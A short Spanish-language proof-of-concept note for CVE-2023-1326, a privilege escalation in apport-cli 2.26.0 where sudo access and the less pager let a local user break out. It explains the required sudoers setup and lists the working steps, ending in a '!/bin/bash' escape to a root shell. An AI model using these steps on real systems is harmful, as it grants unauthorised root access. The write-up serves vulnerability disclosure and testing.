
Exploit de prueba de concepto para CVE-2023-1326, una vulnerabilidad de escalada de privilegios en apport-cli 2.26.0 cuando está configurado con sudo y less como paginador.
Una prueba de concepto para CVE-2023–1326 en apport-cli 2.26.0
Esta vulnerabilidad es una escalada de privilegios en apport-cli 2.26.0, similar a CVE-2023–26604; esta vulnerabilidad solo funciona si se asigna en sudoers:

Se encontró un ataque de escalada de privilegios en apport-cli 2.26.0 y anteriores, similar a CVE-2023-26604. Si un sistema está especialmente configurado para permitir que usuarios no privilegiados ejecuten sudo apport-cli, less está configurado como paginador y se puede establecer el tamaño de la terminal: un atacante local puede escalar privilegios.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
